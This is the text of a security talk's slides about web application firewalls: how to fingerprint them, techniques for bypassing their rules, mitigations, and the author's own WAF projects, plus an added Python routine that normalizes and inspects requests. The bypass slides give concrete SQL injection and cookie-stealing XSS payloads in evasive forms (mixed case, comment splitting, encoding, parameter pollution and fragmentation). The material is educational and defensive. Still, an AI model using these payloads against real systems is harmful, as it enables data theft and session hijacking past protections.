In this presentation you can learn about many practical resources for WAFs, how to build your own WAF, and how protections in common WAFs get bypassed.
2. Whoami
● Antonio Costa aka Cooler_
● Projects: Github.com/CoolerVoid
● Contact: coolerlair@gmail.com
● Cyber security engineer
● Programmer/developer
● 13 years of work experience with pentest, code review, development, incident detection, incident response and hardening.
6. Other resources for rules
● Block per IP address
● Leak mitigation (responses)
● Insert anti-CSRF tokens
● Detect User-Agent anomalies
● Strong blocklist
● Denial of service
● Force hardening headers on custom endpoints: HSTS, anti-XSS, CSP, nosniff…
● Insert cookie attributes: HttpOnly, Secure...
7. Practical point of view
● Detecting the type of WAF
● Common attacks on WAFs
● Custom attacks to bypass a WAF
● Attack mitigation in the WAF
● Attack mitigation in the application
● Create your custom WAF
● My open source projects
● Attack and protection!
8. Detection
You can search for a pattern in the cookie, the response headers…
Each WAF has a different context in its response.
● https://svn.nmap.org/nmap/scripts/http-waf-detect.nse
● https://github.com/sandrogauci/wafw00f
● http://code.google.com/p/imperva-detect/
9. Common attacks
● WAFs can be configured to actively block requests and traffic that violate the WAF rule-sets. This is a useful feature, but it needs to be used judiciously: a WAF in over-active blocking mode prevents legitimate traffic from reaching the web server, making the application unusable.
● Sometimes the rules are weak and don't match the attacks they are supposed to block.
10. Mixed case
● A cool trick to bypass a common rule is mixed case; the point is to take advantage of rules that are not case-insensitive.
● SELECT, SeLect, selEcT… UnIOn, unIoN...
● Look at the following:
● /sell/cars.php?search=<script>alert(document.cookie)</script>
● /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>
11. Replace keywords
● Replacing keywords is a common function in WAFs: it erases the critical words from an attack. It can still be bypassed when the payload is built so that, after the keyword is removed once, the surrounding text still forms the attack word.
● Look at the following:
● /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9
● /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
12. Spaces to comments
● Replacing spaces with comments is a very good way to bypass a WAF.
● Look at the following:
● /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -
● /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -
13. Encode abuse
● Another trick to bypass is abusing encoding; sometimes the application can render encoded strings...
● Look at the following:
<script>alert(document.cookie)</script>
● URL encode:
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
● Base64 encode:
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=
14. Buffer overflow
● When the WAF service doesn't validate its inputs properly, you can see this problem in fuzzing tests...
● Look at the following:
● /cars/id/page/=-25+and+(select 2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7…
● id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...)+uNIoN+seLecT+2,3,version()...
15. HTTP Parameter Pollution (HPP)
The following request doesn't allow anyone to conduct an attack:
● /?id=1;select+4,5,6+from+users+where+id=1--
This request will be performed successfully using HPP:
● /?id=1;select+4&id=5,6+from+users+where+id=1--
● Successful conduction of an HPP attack bypassing a WAF depends on the environment of the application being attacked.
16. Using HTTP Parameter Fragmentation (HPF)
execute_query("select * from table where a=".input_a." and b=".input_b);
execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c);
● The following request doesn't allow anyone to conduct an attack:
● /?a=1+union+select+1,2/*
● These requests are a possible attack using HPF:
● /?a=1+union/*&b=*/select+1,2
● /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
● The SQL requests become:
● select * from table where a=1 union/* and b=*/select 1,2
● select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--
17. Time machine
● Random delay for each request
● Random User-Agent per request
● Random IP address per request (proxy)
● Bypass intrusion prevention systems (IPS) and web application firewalls (WAF)
18. Automate
● Project to transform your list of payloads using many techniques that help bypass a WAF.
● https://github.com/CoolerVoid/payloadmask
19. Fuzzing / Brute force
● 0d1n is a tool for automating customized attacks against web applications.
● Open source
● Uses a thread pool
● Github.com/CoolerVoid/0d1n
23. Application mitigations
● Validation and proper sanitization (remove DOM, JS, HTML…).
● Prepared statements (with parameterized queries).
● Create a function that checks a block list of words common in attacks (eval, timeout, union, --, select, delete, version, benchmark, sleep, /**/...), converting the whole string to lower case before scanning for patterns.
● Study your ORM (SQLAlchemy, Hibernate...) to avoid pitfalls in its resources.
● Follow MITRE and OWASP guidance for hardening, etc...
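As an added example (not code from the deck, nor from the author's projects), here is a Python normalization and inspection routine in the spirit of the block-list function above. It undoes the evasions from the mixed-case, replace-keywords, spaces-to-comment, encode-abuse, HPP and HPF slides before matching, so the rule sees roughly what the backend would execute. The block-list words are the ones listed on this slide; the helper names and the opportunistic base64 heuristic are assumptions.

```python
import base64
import re
from urllib.parse import unquote_plus

# Block-list words taken from the deck's application-mitigation slide
# (assumed starting point; a real rule set is larger and tuned per app).
BLOCKED = ("union", "select", "delete", "eval", "benchmark", "sleep",
           "version", "--", "<script")


def normalize(value: str) -> str:
    """Canonicalise one parameter value before any rule is matched.

    Undoes the evasions the deck walks through: repeated URL encoding,
    base64 payloads, mixed case, and /**/ or MySQL /*!...*/ comment
    splitting. Keyword-stripping evasion (UNIunionON) needs nothing
    special: keywords are matched, never removed, so the inner word hits.
    """
    prev = None
    while prev != value:                   # decode until stable (%253C -> <)
        prev, value = value, unquote_plus(value)
    try:                                   # opportunistic base64: keep it only
        text = base64.b64decode(value, validate=True).decode("ascii")
        if text.isprintable():             # if it yields printable ASCII
            value = text
    except Exception:
        pass
    value = value.lower()                  # defeat mixed case
    value = re.sub(r"/\*!(.*?)\*/", r"\1", value, flags=re.S)  # MySQL runs x in /*!x*/
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)       # drop plain comments
    return re.sub(r"\s+", " ", value).strip()


def inspect_query(query: str) -> dict:
    """Inspect a raw query string (everything after '?').

    Reports duplicated names (HPP) and matches rules per value and on the
    values joined in order, which is how HPF reassembles a split payload.
    """
    pairs = [p.split("=", 1) for p in query.split("&") if p]
    names = [p[0] for p in pairs]
    values = [p[1] if len(p) == 2 else "" for p in pairs]
    hits = set()
    for candidate in names + values + [" ".join(values)]:
        norm = normalize(candidate)
        hits.update(word for word in BLOCKED if word in norm)
    return {"hpp": sorted({n for n in names if names.count(n) > 1}),
            "hits": sorted(hits)}
```

The base64 step is deliberately permissive and will occasionally decode a harmless value; in a production rule engine, gate it on length and on the rest of the request's context.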
25. Create your WAF
● Five years of study around sockets and raw sockets
● Demultiplexer problems (select(), epoll(), kqueue(), pthreads, MPI…)
● Race conditions
● Testing a long list of libraries: libuv (used by Node), libevent (old library at the core of nginx), Python Twisted
26. Create your WAF
● WAF from scratch: RaptorWAF
● The demultiplexer uses select() with pthreads
● Has a problem: race conditions with millions of connections (locking with a mutex cannot save it).
● Easy to understand
● Github.com/CoolerVoid/RaptorWAF
28. Create your WAF
● OctopusWAF
● Uses libevent
● Supports heavy connection loads
● Uses libinjection to detect SQLi
● Github.com/CoolerVoid/OctopusWAF